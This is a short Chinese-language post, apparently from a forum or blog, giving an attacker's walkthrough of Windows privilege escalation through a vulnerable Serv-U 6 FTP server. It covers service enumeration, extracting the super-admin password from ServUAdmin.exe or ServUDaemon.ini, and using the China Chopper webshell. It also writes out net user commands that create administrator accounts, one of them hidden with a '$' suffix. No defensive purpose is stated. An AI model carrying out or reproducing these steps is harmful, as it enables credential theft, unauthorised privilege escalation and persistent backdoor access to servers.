eg:
FTP , MySQL, MSSQL 第三方软件
首先要找到目标服务器上的第三方服务:
方式:
1 . 看进程tasklist
2 . 看端口 netstat -ano
3 . 看文件
FTP提权
Serv-U 6 版本漏洞版本提权
Serv-U 是当前众多的FTP服务器软件之一。通过使用Serv-U,用户能够将任何一台PC 设置成一个FTP 服务器,这样,用户或其他使用者就能够使用FTP 协议,通过在同一网络上的任何一台PC与FTP 服务器连接,进行文件或目录的复制,移动,创建,和删除等。
1 . 进行端口扫描 , 确定服务是否正常运行, 也就是端口是否开放 。 Serv-U 端口43958
2 . 获取Serv-U的超管账号 , 正常情况下超管账号密码是固定的, 可以直接提权。如果被修改,需要下载ServUAdmin.exe程序,这个超管账号在这个程序中,需要读取十六进制进行获取。使用C32Asm.exe软件读取 。 其他用户账号在:ServUDaemon.ini 这个文件中
利用中国菜刀,下载ServUAdmin.exe程序
使用C32Asm.exe软件读取超管密码 ,
搜索 ANSI字符串类型 ,关键字:LocalAdministrator
3 . 利用Serv-U的超管账号 , 提权,直接创建windows server 账号,密码
cmd /c net user test2 123456/add & net localgroup administrators test2 /add
cmd /c net user nvhack$ 121322 /add & net localgroup administrators nvhack$ /add
4 . 查看用户net user test2 , 用户已存在, 并且加入了管理员组
|
发表于 2025-11-19 22:17:01
